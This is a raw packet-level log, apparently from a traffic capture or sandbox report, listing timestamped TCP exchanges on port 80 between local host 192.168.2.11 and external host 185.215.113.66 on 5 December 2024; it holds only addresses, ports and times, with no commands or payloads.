Dec 5, 2024 17:32:05.834758997 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.836656094 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.836783886 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.836819887 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.836819887 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.838937044 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.839065075 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.839098930 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.839241982 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.841207027 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.841300964 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.841336012 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.841336012 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.843362093 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.843435049 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.843475103 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.843475103 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.845562935 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.845762968 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.845798969 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.845798969 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.847732067 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.847896099 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.847929955 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.847930908 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.849778891 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.849960089 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.849992037 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.849992037 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.851891994 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.851937056 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.851989985 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.854062080 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.854104042 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.854104042 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.854201078 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.855772018 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.856064081 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.856209993 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.856242895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.856242895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.858136892 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.858283043 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.858321905 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.858321905 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.860173941 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.860342979 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.860377073 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.860377073 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.862183094 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.862287998 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.862318993 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.862318993 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.864120007 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.864156961 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.864233971 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.866175890 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.866225958 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.866225958 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.866282940 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.867773056 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.868215084 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.868370056 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.868400097 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.868400097 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.870074987 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.870146990 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.870177984 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.870177984 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.872056961 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.872093916 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.872142076 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.872220993 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.874135017 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.874209881 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.874366045 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.874407053 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.876154900 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.876228094 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.876243114 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.876261950 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.877904892 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.877948999 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.878103971 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.878199100 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.880086899 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.880137920 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.880172014 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.880172014 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.881957054 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.881978989 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.882019997 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.882019997 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.883816957 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.883871078 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.883892059 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.883933067 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.885827065 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.885847092 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.885888100 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.885888100 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.887737989 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.887834072 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.887866020 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.887903929 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.889667034 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.889707088 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.889740944 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.889740944 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.891899109 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.892008066 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.892040014 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.892103910 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.893598080 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.893671036 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.893810987 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.893882990 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.895529032 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.895606041 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.895649910 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.895725012 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.897516012 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.897573948 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.897609949 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.897609949 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.899514914 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.899565935 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.899720907 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.899771929 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.901396990 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.901504040 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.901513100 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.901554108 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.903363943 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.903495073 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.903527975 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.903631926 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.905303955 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.905402899 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.905437946 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.905479908 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.907368898 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.907489061 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.907493114 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.907569885 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.909260988 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.909332991 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.909372091 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.909372091 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.911267996 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.911335945 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.911348104 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.911434889 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.913234949 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.913256884 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.913290024 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.913310051 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.915251017 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.915317059 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.915359020 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.915414095 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.917078972 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.917160988 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.917202950 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.917342901 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.919054031 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.919128895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.919189930 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.919254065 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.920967102 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.921013117 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.921046019 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.921046019 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.921195030 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.923213959 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.923285961 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.923306942 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.923347950 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.004967928 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.005064011 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.005094051 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.005172968 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.005706072 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.005803108 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.005853891 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.005949020 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.007282972 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.007349968 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.007374048 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.007426023 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.008784056 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.008862972 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.022865057 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.022927046 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.022937059 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.023005962 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.023540974 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.023638964 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.023669958 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.023735046 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.024928093 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.024976969 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.025053024 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.025090933 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.026233912 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.026318073 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.026349068 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.026537895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.027559042 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.027693987 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.027736902 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.027736902 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.028913021 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.028983116 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.029016972 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.029131889 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.030224085 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.030307055 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.030330896 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.030426025 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.031508923 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.031558037 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.031570911 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.031639099 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.032838106 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.032886028 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.032919884 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.032963037 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.034157038 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.034257889 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.034257889 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.034290075 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.035414934 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.035458088 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.035495043 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.035537004 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.036825895 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.036890984 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.036895990 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.036966085 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.037962914 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.038022995 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.038141966 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.038177013 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.039227962 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.039335966 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.039359093 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.039534092 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.040468931 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.040507078 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.040570974 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.040651083 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.040860891 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.040923119 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.041095972 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.041774988 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.041831970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.041867971 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.041930914 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.042977095 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.043016911 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.043143034 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.043236971 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.044281960 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.044334888 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.044441938 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.044504881 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.045464039 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.045536995 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.045670033 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.045742989 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.046679974 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.046745062 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.046808958 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.046931028 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.047862053 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.048003912 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.048026085 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.048063040 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.049134016 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.049175978 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.049181938 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.049227953 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.050338984 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.050451040 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.050515890 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.050550938 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.051701069 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.051759958 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.051822901 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.051925898 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.052723885 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.052797079 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.052818060 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.052860022 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.054100037 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.054155111 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.054184914 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.054316044 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.056463957 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.056504965 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.056534052 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.056566000 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.056997061 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.057035923 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.057064056 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.057092905 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.058489084 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.058532953 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.058789968 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.058834076 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.060020924 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.060065985 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.060219049 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.060257912 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.060482979 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.060528040 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.060565948 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.060602903 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.061502934 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.061547041 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.061579943 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.061615944 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.062463999 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.062510014 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.062525988 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.062560081 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.063766003 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.063817024 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.063963890 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.063996077 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.064892054 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.064930916 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.065063953 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.065105915 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.066188097 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.066232920 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.066303015 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.066338062 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.067295074 CET	80	49775	185.215.113.66	192.168.2.11
